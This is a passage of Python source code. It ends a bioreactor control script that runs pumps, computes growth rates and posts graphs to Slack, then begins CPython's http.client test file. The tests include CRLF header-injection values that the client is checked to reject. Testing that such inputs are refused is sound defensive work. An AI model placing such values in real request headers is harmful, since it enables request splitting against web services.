line, label = DM.get_legend_handles_labels()
lines += line
labels += label
ODthr.legend(lines, labels, loc=2)
# ODplt = (allODs[['current']]).plot() #figsize=(10,10) in the plot
ODfig = ODthr.get_figure()
ODfig.savefig("%s/%s/%s/ODthreads_%s.png" % (self.root_dir, self.sysstr, self.start_time, self.start_time))
ODfig.clf(); ODthr.figure = None; ODthr = None; ODfig = None; fig = None; allconcs= None; colors = None; DM = None
plt.close('all')
with open("%s/%s/%s/ODthreads_%s.png" % (self.root_dir, self.sysstr, self.start_time, self.start_time), "rb") as file_content:
thrmsg = self.slack_client.api_call(
"files.upload",
channels = self.chan,
thread_ts = self.threadts,
title = "ODThreads",
file = file_content
)
# TEMP GRAPH
if self.temp_sensor:
plt.rcParams["figure.dpi"] = 200
ODthr = (allODs[['average']]).plot(label='average', color='tab:blue') #figsize=(10,10) in the plot
ODthr.set_ylabel(ylabel='Average OD')
lines, labels = ODthr.get_legend_handles_labels()
DM = ODthr.twinx()
DM.spines['right'].set_position(('axes', 1.0))
allODs[['temp']].plot(ax = DM, label='threads',color='tab:pink',legend=False)
DM.set_ylabel(ylabel='Incubator Temperature (C)')
line, label = DM.get_legend_handles_labels()
lines += line
labels += label
ODthr.legend(lines, labels, loc=2)
# ODplt = (allODs[['current']]).plot() #figsize=(10,10) in the plot
ODfig = ODthr.get_figure()
ODfig.savefig("%s/%s/%s/ODtemp_%s.png" % (self.root_dir, self.sysstr, self.start_time, self.start_time), bbox_inches='tight')
ODfig.clf(); ODthr.figure = None; ODthr = None; ODfig = None; fig = None; allconcs= None; colors = None; DM = None
plt.close('all')
with open("%s/%s/%s/ODtemp_%s.png" % (self.root_dir, self.sysstr, self.start_time, self.start_time), "rb") as file_content:
tempmsp = self.slack_client.api_call(
"files.upload",
channels = self.chan,
thread_ts = self.threadts,
title = "ODTemp",
file = file_content
)
# DIL RATE GRAPH
plt.rcParams["figure.dpi"] = 200
ODthr = (allODs[['average']]).plot(label='average', color='tab:blue') #figsize=(10,10) in the plot
ODthr.set_ylabel(ylabel='Average OD')
lines, labels = ODthr.get_legend_handles_labels()
DM = ODthr.twinx()
DM.spines['right'].set_position(('axes', 1.0))
allpumps[['dil_rate']].plot(ax = DM, label='threads',color='tab:grey',legend=False)
DM.set_ylabel(ylabel='Dilution Rate (Hz)')
line, label = DM.get_legend_handles_labels()
lines += line
labels += label
ODthr.legend(lines, labels, loc=2)
# ODplt = (allODs[['current']]).plot() #figsize=(10,10) in the plot
ODfig = ODthr.get_figure()
ODfig.savefig("%s/%s/%s/ODdilR_%s.png" % (self.root_dir, self.sysstr, self.start_time, self.start_time))
ODfig.clf(); allODs = None; allpumps = None; ODthr.figure = None; ODthr = None; ODfig = None; fig = None; allconcs= None; colors = None; DM = None
plt.close('all')
with open("%s/%s/%s/ODdilR_%s.png" % (self.root_dir, self.sysstr, self.start_time, self.start_time), "rb") as file_content:
dilrmsg = self.slack_client.api_call(
"files.upload",
channels = self.chan,
thread_ts = self.threadts,
title = "ODDilR",
file = file_content
)
if self.firstrec:
self.recmes = self.slack_client.api_call(
"chat.postMessage",
channel = self.chan,
username=self.sysstr,
icon_url = self.slack_usericon,
text = ('Elapsed Time: %s ; OD = %.3f' % (self.secondsToText(int(self.elapsed_time.total_seconds())),self.avOD)),
thread_ts = self.recgrats
)
with open("%s/%s/%s/ODplot_%s.png" % (self.root_dir, self.sysstr, self.start_time, self.start_time), "rb") as file_content:
self.recod = self.slack_client.api_call(
"files.upload",
channels = self.chan,
thread_ts = self.recgrats,
title = "ODPlot",
file = file_content
)
with open("%s/%s/%s/ODconc_%s.png" % (self.root_dir, self.sysstr, self.start_time, self.start_time), "rb") as file_content:
self.recodc = self.slack_client.api_call(
"files.upload",
channels = self.chan,
thread_ts = self.recgrats,
title = "ODConc",
file = file_content
)
with open("%s/%s/%s/PUplot_%s.png" % (self.root_dir, self.sysstr, self.start_time, self.start_time), "rb") as file_content:
self.recpu = self.slack_client.api_call(
"files.upload",
channels = self.chan,
thread_ts = self.recgrats,
title = "PUPlot",
file = file_content
)
with open("/%s/%s/%s/ODthreads_%s.png" % (self.root_dir, self.sysstr, self.start_time, self.start_time), "rb") as file_content:
self.rethr = self.slack_client.api_call(
"files.upload",
channels = self.chan,
thread_ts = self.recgrats,
title = "ODThreads",
file = file_content
)
if self.temp_sensor:
with open("%s/%s/%s/ODtemp_%s.png" % (self.root_dir, self.sysstr, self.start_time, self.start_time), "rb") as file_content:
self.retmp = self.slack_client.api_call(
"files.upload",
channels = self.chan,
thread_ts = self.recgrats,
title = "ODTemp",
file = file_content
)
# print(self.recod['file']['shares']['public'][self.chanid][0]['ts'])
with open("%s/%s/%s/ODdilR_%s.png" % (self.root_dir, self.sysstr, self.start_time, self.start_time), "rb") as file_content:
self.redilr = self.slack_client.api_call(
"files.upload",
channels = self.chan,
thread_ts = self.recgrats,
title = "ODDilR",
file = file_content
)
self.firstrec = False
else:
delmsg = self.slack_client.api_call(
"chat.delete",
channel = self.chanid,
ts = self.recmes['ts']
)
delod = self.slack_client.api_call(
"chat.delete",
channel = self.chanid,
ts = self.recod['file']['shares']['public'][self.chanid][0]['ts']
)
delodc = self.slack_client.api_call(
"chat.delete",
channel = self.chanid,
ts = self.recodc['file']['shares']['public'][self.chanid][0]['ts']
)
delrec = self.slack_client.api_call(
"chat.delete",
channel = self.chanid,
ts = self.recpu['file']['shares']['public'][self.chanid][0]['ts']
)
delthr = self.slack_client.api_call(
"chat.delete",
channel = self.chanid,
ts = self.rethr['file']['shares']['public'][self.chanid][0]['ts']
)
if self.temp_sensor:
deltmp = self.slack_client.api_call(
"chat.delete",
channel = self.chanid,
ts = self.retmp['file']['shares']['public'][self.chanid][0]['ts']
)
deldilr = self.slack_client.api_call(
"chat.delete",
channel = self.chanid,
ts = self.redilr['file']['shares']['public'][self.chanid][0]['ts']
)
self.recmes = self.slack_client.api_call(
"chat.postMessage",
channel = self.chan,
username=self.sysstr,
icon_url = self.slack_usericon,
text = ('Elapsed Time: %s ; OD = %.3f' % (self.secondsToText(int(self.elapsed_time.total_seconds())),self.avOD)),
thread_ts = self.recgrats
)
with open("%s/%s/%s/ODplot_%s.png" % (self.root_dir, self.sysstr, self.start_time, self.start_time), "rb") as file_content:
self.recod = self.slack_client.api_call(
"files.upload",
channels = self.chan,
thread_ts = self.recgrats,
title = "ODPlot",
file = file_content
)
with open("%s/%s/%s/ODconc_%s.png" % (self.root_dir, self.sysstr, self.start_time, self.start_time), "rb") as file_content:
self.recodc = self.slack_client.api_call(
"files.upload",
channels = self.chan,
thread_ts = self.recgrats,
title = "ODConc",
file = file_content
)
with open("%s/%s/%s/PUplot_%s.png" % (self.root_dir, self.sysstr, self.start_time, self.start_time), "rb") as file_content:
self.recpu = self.slack_client.api_call(
"files.upload",
channels = self.chan,
thread_ts = self.recgrats,
title = "PUPlot",
file = file_content
)
with open("%s/%s/%s/ODthreads_%s.png" % (self.root_dir, self.sysstr, self.start_time, self.start_time), "rb") as file_content:
self.rethr = self.slack_client.api_call(
"files.upload",
channels = self.chan,
thread_ts = self.recgrats,
title = "ODThreads",
file = file_content
)
if self.temp_sensor:
with open("%s/%s/%s/ODtemp_%s.png" % (self.root_dir, self.sysstr, self.start_time, self.start_time), "rb") as file_content:
self.retmp = self.slack_client.api_call(
"files.upload",
channels = self.chan,
thread_ts = self.recgrats,
title = "ODTemp",
file = file_content
)
with open("%s/%s/%s/ODdilR_%s.png" % (self.root_dir, self.sysstr, self.start_time, self.start_time), "rb") as file_content:
self.redilr = self.slack_client.api_call(
"files.upload",
channels = self.chan,
thread_ts = self.recgrats,
title = "ODDilR",
file = file_content
)
except Exception as e:
exc_type, exc_obj, exc_tb = sys.exc_info()
fname = os.path.split(exc_tb.tb_frame.f_code.co_filename)[1]
print(exc_type, fname, exc_tb.tb_lineno)
pass
self.thread_locks['graphs'].release()
def dynLimit(self):
self.thread_locks['dynL'].acquire()
self.growthOD.append(self.avOD)
self.growthrate_t.append((self.elapsed_time.total_seconds()/3600))
if len(self.growthOD) == self.avefac:
god_temp = np.diff(self.growthOD)/np.diff(self.growthrate_t)
self.growthrate.append(sum(god_temp)/len(god_temp))
self.growthOD.pop(0)
if len(self.growthrate) < self.avefac:
self.growthrate_t.pop(0)
if len(self.growthrate) == self.avefac:
gr_temp = np.diff(self.growthrate)/np.diff(self.growthrate_t)
self.growthrate2.append(sum(gr_temp)/len(gr_temp))
self.growthrate.pop(0)
self.growthrate_t.pop(0)
if len(self.growthrate2) == self.avefac:
self.instant_gr = sum(god_temp)/len(god_temp)
self.instant_gr2 = sum(gr_temp)/len(gr_temp)
self.growthrate2.pop(0)
if self.instant_gr > self.OD_err and self.instant_gr2 < 0.01:
self.OD_thr_set = True
self.OD_min = self.avOD
self.OD_thr = self.OD_min*1.25
self.thread_locks['dynL'].release()
def control_alg(self):
try:
print_buffer = 0
self.init_pins(self.pin_list)
if self.selection == 'toprak':
if self.avOD > self.OD_min:
self.pump_waste()
if self.avOD > self.OD_thr and self.avOD > self.last_dilutionOD:
self.pump_drug()
else:
self.pump_media()
else: #report even when pumps aren't activated yet
self.no_pump()
elif self.selection == 'constant':
if self.avOD > self.OD_min:
self.pump_waste()
if self.vial_drug_mass/self.culture_vol < self.vial_conc:
self.pump_drug()
else:
self.pump_media()
else: #report even when pumps aren't activated yet
self.no_pump()
self.dil_rate_calc()
self.last_dilutionOD = self.avOD
except Exception as e:
print ('[%s] CA - WARNING ADC REQUEST CRASHED' % self.sysstr)
print(e)
exc_type, exc_obj, exc_tb = sys.exc_info()
fname = os.path.split(exc_tb.tb_frame.f_code.co_filename)[1]
print(exc_type, fname, exc_tb.tb_lineno)
pass
self.thread_locks['control_alg'].release()
def pump_waste(self):
self.pump_on(self.P_waste_pins)
time.sleep(self.P_waste_times)
self.pump_off(self.P_waste_pins)
self.waste = 3
self.vial_drug_mass = self.vial_drug_mass - (self.vial_drug_mass/self.culture_vol)
def pump_drug(self):
print('[%s] OD Threshold exceeded, pumping %s' % (self.sysstr,self.drug_name))
self.pump_on(self.P_drug_pins)
time.sleep(self.P_drug_times)
self.pump_off(self.P_drug_pins)
self.drug = 2
self.pump_act_times.append(self.P_drug_times)
self.vial_drug_mass = self.vial_drug_mass + self.drug_conc * self.P_drug_times * self.drug_pump_flo_rate
drugamsg = self.slack_client.api_call(
"chat.postMessage",
channel = self.chan,
username=self.sysstr,
icon_url = self.slack_usericon,
thread_ts = self.threadts,
text = "OD = %0.3f, pumping %s. Drug concentration: %f ug/mL" % (self.avOD, self.drug_name, (self.vial_drug_mass)/self.culture_vol)
)
def pump_media(self):
print('[%s] OD below threshold, pumping nutrient' % self.sysstr)
self.pump_on(self.P_nut_pins)
time.sleep(self.P_nut_times)
self.pump_off(self.P_nut_pins)
self.nut = 1
self.pump_act_times.append(self.P_nut_times)
thramgs = self.slack_client.api_call(
"chat.postMessage",
channel = self.chan,
username=self.sysstr,
icon_url = self.slack_usericon,
thread_ts = self.threadts,
text = "OD = %0.3f, pumping nutrient. %s concentration: %f ug/mL" % (self.avOD, self.drug_name.capitalize(), (self.vial_drug_mass)/self.culture_vol)
)
def no_pump(self):
self.pump_act_times.append(0)
# self.vial_drug_mass = 0 if self.vial_drug_mass < 0
thrbmsg = self.slack_client.api_call(
"chat.postMessage",
channel = self.chan,
username=self.sysstr,
icon_url = self.slack_usericon,
thread_ts = self.threadts,
text = "OD = %0.3f, OD below nutrient pump threshold." % (self.avOD)
)
def dil_rate_calc(self):
if len(self.pump_act_times) > 3:
self.pump_act_times.pop(0)
if self.drug == 2:
self.dil_rate = self.drug_pump_flo_rate * self.pump_act_times[-1]/(self.time_between_pumps * self.culture_vol)
elif self.nut == 1:
self.dil_rate = self.nut_pump_flo_rate * self.pump_act_times[-1]/(self.time_between_pumps * self.culture_vol)
else:
self.dil_rate = 0
# self.dil_rate_smo = self.pump_flo_rate * np.mean(self.pump_act_times)/(self.time_between_pumps * self.culture_vol)
def secondsToText(self,secs):
if secs:
days = secs//86400
hours = (secs - days*86400)//3600
minutes = (secs - days*86400 - hours*3600)//60
seconds = secs - days*86400 - hours*3600 - minutes*60
result = ("{0} day{1}, ".format(days, "s" if days!=1 else "") if days else "") + \
("{0} hour{1}, ".format(hours, "s" if hours!=1 else "") if hours else "") + \
("{0} minute{1}, ".format(minutes, "s" if minutes!=1 else "") if minutes else "") + \
("{0} second{1}, ".format(seconds, "s" if seconds!=1 else "") if seconds else "")
return result[:-2]
else:
return "0 seconds"
def on_timer(self):
self.loops += 1
if self.loops < self.total_time/self.time_between_ODs:
threading.Timer(self.time_between_ODs,self.on_timer).start()
else:
self.now = datetime.now()
self.nows = time.time()
print('[%s] Experiment Complete at %02s:%02s:%02s ' % (self.sysstr, self.now.hour, self.now.minute, self.now.second))
# GPIO.output(P_fan_pins,0)
compmsg = self.slack_client.api_call(
"chat.postMessage",
channel = self.chan,
username=self.sysstr,
icon_url = self.slack_usericon,
thread_ts = self.threadts,
text = "Experiment Complete at %02s:%02s:%02s " % (self.now.hour, self.now.minute, self.now.second)
)
if self.loops > 1:
if not self.thread_locks['threads'].locked():
self.threads['threads'] = threading.Thread(target=self.thread_split())
self.threads['threads'].start()
else:
self.threads['threads'] = threading.Thread(target=self.thread_split())
self.threads['threads'].start()
def thread_split(self):
self.thread_locks['threads'].acquire()
self.now = datetime.now()
self.nows = time.time()
#print(self.loops)
self.elapsed_time = self.now - self.start_time
self.active_threads = threading.active_count()
# Count see if the thread is locked for a long time
global i2c_q
global graph_q
if self.loops > 1:
if not self.thread_locks['adc'].locked():
self.thread_locks['adc'].acquire()
i2c_q.append(str(self.sysnum-1)+'OD')
if not self.thread_locks['dynL'].locked():
if (self.loops % int(self.thresh_check*60/self.time_between_ODs)) == 0 and not self.OD_thr_set:
self.threads['dynL'] = threading.Thread(target=self.dynLimit)
self.threads['dynL'].start()
if not self.thread_locks['control_alg'].locked():
if self.loops % (self.loops_between_pumps) == 0:
self.thread_locks['control_alg'].acquire()
i2c_q.append(str(self.sysnum-1)+'CA')
if not self.thread_locks['graphs'].locked():
if (self.loops % int(self.time_between_graphs*60/self.time_between_ODs)) == 0:
self.thread_locks['graphs'].acquire()
graph_q.append(self.sysnum-1)
else:
self.thread_locks['adc'].acquire()
i2c_q.append(str(self.sysnum-1)+'OD')
if (self.loops % int(self.thresh_check*60/self.time_between_ODs)) == 0 and not self.OD_thr_set:
self.threads['dynL'] = threading.Thread(target=self.dynLimit)
self.threads['dynL'].start()
if self.loops % (self.loops_between_pumps) == 0:
self.thread_locks['control_alg'].acquire()
i2c_q.append(str(self.sysnum-1)+'CA')
if (self.loops % int(self.time_between_graphs*60/self.time_between_ODs)) == 0:
self.thread_locks['graphs'].acquire()
graph_q.append(self.sysnum-1)
# save the data to disk if it's time
if (self.loops % int(self.time_between_saves*60/self.time_between_ODs)) == 0:
if self.printing:
print('[%s] Saving to disk' % self.sysstr)
self.threads['save'] = threading.Thread(target=self.savefunc)
self.threads['save'].start()
else:
if self.printing:
print('[%s] Buffering Data' % self.sysstr)
self.threads['buffer'] = threading.Thread(target=self.bufferdata)
self.threads['buffer'].start()
if self.printing:
print ('[%s] Elapsed Time: %s ; Threads = %d ; OD = %.3f' % (self.sysstr, self.secondsToText(int(self.elapsed_time.total_seconds())),self.active_threads,self.avOD))
self.thread_locks['threads'].release()
chips = IC_init()
threading.Thread(target = i2c_controller).start()
threading.Thread(target = graph_controller).start()
if config['MAIN'].getboolean('temp_sensor'): threading.Thread(target = temp_sensor_func).start()
eve_starter()
threading.Thread(target = live_plotter).start()
# threading.Thread(target = slackresponder).start()
|
test_httplib.py
|
import errno
from http import client
import io
import itertools
import os
import array
import re
import socket
import threading
import warnings
import unittest
TestCase = unittest.TestCase
from test import support
from test.support import os_helper
from test.support import socket_helper
from test.support import warnings_helper
here = os.path.dirname(__file__)
# Self-signed cert file for 'localhost'
CERT_localhost = os.path.join(here, 'keycert.pem')
# Self-signed cert file for 'fakehostname'
CERT_fakehostname = os.path.join(here, 'keycert2.pem')
# Self-signed cert file for self-signed.pythontest.net
CERT_selfsigned_pythontestdotnet = os.path.join(here, 'selfsigned_pythontestdotnet.pem')
# constants for testing chunked encoding
chunked_start = (
'HTTP/1.1 200 OK\r\n'
'Transfer-Encoding: chunked\r\n\r\n'
'a\r\n'
'hello worl\r\n'
'3\r\n'
'd! \r\n'
'8\r\n'
'and now \r\n'
'22\r\n'
'for something completely different\r\n'
)
chunked_expected = b'hello world! and now for something completely different'
chunk_extension = ";foo=bar"
last_chunk = "0\r\n"
last_chunk_extended = "0" + chunk_extension + "\r\n"
trailers = "X-Dummy: foo\r\nX-Dumm2: bar\r\n"
chunked_end = "\r\n"
HOST = socket_helper.HOST
class FakeSocket:
def __init__(self, text, fileclass=io.BytesIO, host=None, port=None):
if isinstance(text, str):
text = text.encode("ascii")
self.text = text
self.fileclass = fileclass
self.data = b''
self.sendall_calls = 0
self.file_closed = False
self.host = host
self.port = port
def sendall(self, data):
self.sendall_calls += 1
self.data += data
def makefile(self, mode, bufsize=None):
if mode != 'r' and mode != 'rb':
raise client.UnimplementedFileMode()
# keep the file around so we can check how much was read from it
self.file = self.fileclass(self.text)
self.file.close = self.file_close #nerf close ()
return self.file
def file_close(self):
self.file_closed = True
def close(self):
pass
def setsockopt(self, level, optname, value):
pass
class EPipeSocket(FakeSocket):
def __init__(self, text, pipe_trigger):
# When sendall() is called with pipe_trigger, raise EPIPE.
FakeSocket.__init__(self, text)
self.pipe_trigger = pipe_trigger
def sendall(self, data):
if self.pipe_trigger in data:
raise OSError(errno.EPIPE, "gotcha")
self.data += data
def close(self):
pass
class NoEOFBytesIO(io.BytesIO):
"""Like BytesIO, but raises AssertionError on EOF.
This is used below to test that http.client doesn't try to read
more from the underlying file than it should.
"""
def read(self, n=-1):
data = io.BytesIO.read(self, n)
if data == b'':
raise AssertionError('caller tried to read past EOF')
return data
def readline(self, length=None):
data = io.BytesIO.readline(self, length)
if data == b'':
raise AssertionError('caller tried to read past EOF')
return data
class FakeSocketHTTPConnection(client.HTTPConnection):
"""HTTPConnection subclass using FakeSocket; counts connect() calls"""
def __init__(self, *args):
self.connections = 0
super().__init__('example.com')
self.fake_socket_args = args
self._create_connection = self.create_connection
def connect(self):
"""Count the number of times connect() is invoked"""
self.connections += 1
return super().connect()
def create_connection(self, *pos, **kw):
return FakeSocket(*self.fake_socket_args)
class HeaderTests(TestCase):
def test_auto_headers(self):
# Some headers are added automatically, but should not be added by
# .request() if they are explicitly set.
class HeaderCountingBuffer(list):
def __init__(self):
self.count = {}
def append(self, item):
kv = item.split(b':')
if len(kv) > 1:
# item is a 'Key: Value' header string
lcKey = kv[0].decode('ascii').lower()
self.count.setdefault(lcKey, 0)
self.count[lcKey] += 1
list.append(self, item)
for explicit_header in True, False:
for header in 'Content-length', 'Host', 'Accept-encoding':
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket('blahblahblah')
conn._buffer = HeaderCountingBuffer()
body = 'spamspamspam'
headers = {}
if explicit_header:
headers[header] = str(len(body))
conn.request('POST', '/', body, headers)
self.assertEqual(conn._buffer.count[header.lower()], 1)
def test_content_length_0(self):
class ContentLengthChecker(list):
def __init__(self):
list.__init__(self)
self.content_length = None
def append(self, item):
kv = item.split(b':', 1)
if len(kv) > 1 and kv[0].lower() == b'content-length':
self.content_length = kv[1].strip()
list.append(self, item)
# Here, we're testing that methods expecting a body get a
# content-length set to zero if the body is empty (either None or '')
bodies = (None, '')
methods_with_body = ('PUT', 'POST', 'PATCH')
for method, body in itertools.product(methods_with_body, bodies):
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket(None)
conn._buffer = ContentLengthChecker()
conn.request(method, '/', body)
self.assertEqual(
conn._buffer.content_length, b'0',
'Header Content-Length incorrect on {}'.format(method)
)
# For these methods, we make sure that content-length is not set when
# the body is None because it might cause unexpected behaviour on the
# server.
methods_without_body = (
'GET', 'CONNECT', 'DELETE', 'HEAD', 'OPTIONS', 'TRACE',
)
for method in methods_without_body:
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket(None)
conn._buffer = ContentLengthChecker()
conn.request(method, '/', None)
self.assertEqual(
conn._buffer.content_length, None,
'Header Content-Length set for empty body on {}'.format(method)
)
# If the body is set to '', that's considered to be "present but
# empty" rather than "missing", so content length would be set, even
# for methods that don't expect a body.
for method in methods_without_body:
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket(None)
conn._buffer = ContentLengthChecker()
conn.request(method, '/', '')
self.assertEqual(
conn._buffer.content_length, b'0',
'Header Content-Length incorrect on {}'.format(method)
)
# If the body is set, make sure Content-Length is set.
for method in itertools.chain(methods_without_body, methods_with_body):
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket(None)
conn._buffer = ContentLengthChecker()
conn.request(method, '/', ' ')
self.assertEqual(
conn._buffer.content_length, b'1',
'Header Content-Length incorrect on {}'.format(method)
)
def test_putheader(self):
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket(None)
conn.putrequest('GET','/')
conn.putheader('Content-length', 42)
self.assertIn(b'Content-length: 42', conn._buffer)
conn.putheader('Foo', ' bar ')
self.assertIn(b'Foo: bar ', conn._buffer)
conn.putheader('Bar', '\tbaz\t')
self.assertIn(b'Bar: \tbaz\t', conn._buffer)
conn.putheader('Authorization', 'Bearer mytoken')
self.assertIn(b'Authorization: Bearer mytoken', conn._buffer)
conn.putheader('IterHeader', 'IterA', 'IterB')
self.assertIn(b'IterHeader: IterA\r\n\tIterB', conn._buffer)
conn.putheader('LatinHeader', b'\xFF')
self.assertIn(b'LatinHeader: \xFF', conn._buffer)
conn.putheader('Utf8Header', b'\xc3\x80')
self.assertIn(b'Utf8Header: \xc3\x80', conn._buffer)
conn.putheader('C1-Control', b'next\x85line')
self.assertIn(b'C1-Control: next\x85line', conn._buffer)
conn.putheader('Embedded-Fold-Space', 'is\r\n allowed')
self.assertIn(b'Embedded-Fold-Space: is\r\n allowed', conn._buffer)
conn.putheader('Embedded-Fold-Tab', 'is\r\n\tallowed')
self.assertIn(b'Embedded-Fold-Tab: is\r\n\tallowed', conn._buffer)
conn.putheader('Key Space', 'value')
self.assertIn(b'Key Space: value', conn._buffer)
conn.putheader('KeySpace ', 'value')
self.assertIn(b'KeySpace : value', conn._buffer)
conn.putheader(b'Nonbreak\xa0Space', 'value')
self.assertIn(b'Nonbreak\xa0Space: value', conn._buffer)
conn.putheader(b'\xa0NonbreakSpace', 'value')
self.assertIn(b'\xa0NonbreakSpace: value', conn._buffer)
def test_ipv6host_header(self):
# Default host header on IPv6 transaction should be wrapped by [] if
# it is an IPv6 address
expected = b'GET /foo HTTP/1.1\r\nHost: [2001::]:81\r\n' \
b'Accept-Encoding: identity\r\n\r\n'
conn = client.HTTPConnection('[2001::]:81')
sock = FakeSocket('')
conn.sock = sock
conn.request('GET', '/foo')
self.assertTrue(sock.data.startswith(expected))
expected = b'GET /foo HTTP/1.1\r\nHost: [2001:102A::]\r\n' \
b'Accept-Encoding: identity\r\n\r\n'
conn = client.HTTPConnection('[2001:102A::]')
sock = FakeSocket('')
conn.sock = sock
conn.request('GET', '/foo')
self.assertTrue(sock.data.startswith(expected))
def test_malformed_headers_coped_with(self):
# Issue 19996
body = "HTTP/1.1 200 OK\r\nFirst: val\r\n: nval\r\nSecond: val\r\n\r\n"
sock = FakeSocket(body)
resp = client.HTTPResponse(sock)
resp.begin()
self.assertEqual(resp.getheader('First'), 'val')
self.assertEqual(resp.getheader('Second'), 'val')
def test_parse_all_octets(self):
# Ensure no valid header field octet breaks the parser
body = (
b'HTTP/1.1 200 OK\r\n'
b"!#$%&'*+-.^_`|~: value\r\n" # Special token characters
b'VCHAR: ' + bytes(range(0x21, 0x7E + 1)) + b'\r\n'
b'obs-text: ' + bytes(range(0x80, 0xFF + 1)) + b'\r\n'
b'obs-fold: text\r\n'
b' folded with space\r\n'
b'\tfolded with tab\r\n'
b'Content-Length: 0\r\n'
b'\r\n'
)
sock = FakeSocket(body)
resp = client.HTTPResponse(sock)
resp.begin()
self.assertEqual(resp.getheader('Content-Length'), '0')
self.assertEqual(resp.msg['Content-Length'], '0')
self.assertEqual(resp.getheader("!#$%&'*+-.^_`|~"), 'value')
self.assertEqual(resp.msg["!#$%&'*+-.^_`|~"], 'value')
vchar = ''.join(map(chr, range(0x21, 0x7E + 1)))
self.assertEqual(resp.getheader('VCHAR'), vchar)
self.assertEqual(resp.msg['VCHAR'], vchar)
self.assertIsNotNone(resp.getheader('obs-text'))
self.assertIn('obs-text', resp.msg)
for folded in (resp.getheader('obs-fold'), resp.msg['obs-fold']):
self.assertTrue(folded.startswith('text'))
self.assertIn(' folded with space', folded)
self.assertTrue(folded.endswith('folded with tab'))
def test_invalid_headers(self):
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket('')
conn.putrequest('GET', '/')
# http://tools.ietf.org/html/rfc7230#section-3.2.4, whitespace is no
# longer allowed in header names
cases = (
(b'Invalid\r\nName', b'ValidValue'),
(b'Invalid\rName', b'ValidValue'),
(b'Invalid\nName', b'ValidValue'),
(b'\r\nInvalidName', b'ValidValue'),
(b'\rInvalidName', b'ValidValue'),
(b'\nInvalidName', b'ValidValue'),
(b' InvalidName', b'ValidValue'),
(b'\tInvalidName', b'ValidValue'),
(b'Invalid:Name', b'ValidValue'),
(b':InvalidName', b'ValidValue'),
(b'ValidName', b'Invalid\r\nValue'),
(b'ValidName', b'Invalid\rValue'),
(b'ValidName', b'Invalid\nValue'),
(b'ValidName', b'InvalidValue\r\n'),
(b'ValidName', b'InvalidValue\r'),
(b'ValidName', b'InvalidValue\n'),
)
for name, value in cases:
with self.subTest((name, value)):
with self.assertRaisesRegex(ValueError, 'Invalid header'):
conn.putheader(name, value)
def test_headers_debuglevel(self):
body = (
b'HTTP/1.1 200 OK\r\n'
b'First: val\r\n'
b'Second: val1\r\n'
b'Second: val2\r\n'
)
sock = FakeSocket(body)
resp = client.HTTPResponse(sock, debuglevel=1)
with support.captured_stdout() as output:
resp.begin()
lines = output.getvalue().splitlines()
self.assertEqual(lines[0], "reply: 'HTTP/1.1 200 OK\\r\\n'")
self.assertEqual(lines[1], "header: First: val")
self.assertEqual(lines[2], "header: Second: val1")
self.assertEqual(lines[3], "header: Second: val2")
class TransferEncodingTest(TestCase):
expected_body = b"It's just a flesh wound"
def test_endheaders_chunked(self):
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket(b'')
conn.putrequest('POST', '/')
conn.endheaders(self._make_body(), encode_chunked=True)
_, _, body = self._parse_request(conn.sock.data)
body = self._parse_chunked(body)
self.assertEqual(body, self.expected_body)
def test_explicit_headers(self):
# explicit chunked
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket(b'')
# this shouldn't actually be automatically chunk-encoded because the
# calling code has explicitly stated that it's taking care of it
conn.request(
'POST', '/', self._make_body(), {'Transfer-Encoding': 'chunked'})
_, headers, body = self._parse_request(conn.sock.data)
self.assertNotIn('content-length', [k.lower() for k in headers.keys()])
self.assertEqual(headers['Transfer-Encoding'], 'chunked')
self.assertEqual(body, self.expected_body)
# explicit chunked, string body
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket(b'')
conn.request(
'POST', '/', self.expected_body.decode('latin-1'),
{'Transfer-Encoding': 'chunked'})
_, headers, body = self._parse_request(conn.sock.data)
self.assertNotIn('content-length', [k.lower() for k in headers.keys()])
self.assertEqual(headers['Transfer-Encoding'], 'chunked')
self.assertEqual(body, self.expected_body)
# User-specified TE, but request() does the chunk encoding
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket(b'')
conn.request('POST', '/',
headers={'Transfer-Encoding': 'gzip, chunked'},
encode_chunked=True,
body=self._make_body())
_, headers, body = self._parse_request(conn.sock.data)
self.assertNotIn('content-length', [k.lower() for k in headers])
self.assertEqual(headers['Transfer-Encoding'], 'gzip, chunked')
self.assertEqual(self._parse_chunked(body), self.expected_body)
def test_request(self):
for empty_lines in (False, True,):
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket(b'')
conn.request(
'POST', '/', self._make_body(empty_lines=empty_lines))
_, headers, body = self._parse_request(conn.sock.data)
body = self._parse_chunked(body)
self.assertEqual(body, self.expected_body)
self.assertEqual(headers['Transfer-Encoding'], 'chunked')
# Content-Length and Transfer-Encoding SHOULD not be sent in the
# same request
self.assertNotIn('content-length', [k.lower() for k in headers])
def test_empty_body(self):
# Zero-length iterable should be treated like any other iterable
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket(b'')
conn.request('POST', '/', ())
_, headers, body = self._parse_request(conn.sock.data)
self.assertEqual(headers['Transfer-Encoding'], 'chunked')
self.assertNotIn('content-length', [k.lower() for k in headers])
self.assertEqual(body, b"0\r\n\r\n")
def _make_body(self, empty_lines=False):
lines = self.expected_body.split(b' ')
for idx, line in enumerate(lines):
# for testing handling empty lines
if empty_lines and idx % 2:
yield b''
if idx < len(lines) - 1:
yield line + b' '
else:
yield line
def _parse_request(self, data):
lines = data.split(b'\r\n')
request = lines[0]
headers = {}
n = 1
while n < len(lines) and len(lines[n]) > 0:
key, val = lines[n].split(b':')
key = key.decode('latin-1').strip()
headers[key] = val.decode('latin-1').strip()
n += 1
return request, headers, b'\r\n'.join(lines[n + 1:])
def _parse_chunked(self, data):
body = []
trailers = {}
n = 0
lines = data.split(b'\r\n')
# parse body
while True:
size, chunk = lines[n:n+2]
size = int(size, 16)
if size == 0:
n += 1
break
self.assertEqual(size, len(chunk))
body.append(chunk)
n += 2
# we /should/ hit the end chunk, but check against the size of
# lines so we're not stuck in an infinite loop should we get
# malformed data
if n > len(lines):
break
return b''.join(body)
class BasicTest(TestCase):
def test_status_lines(self):
# Test HTTP status lines
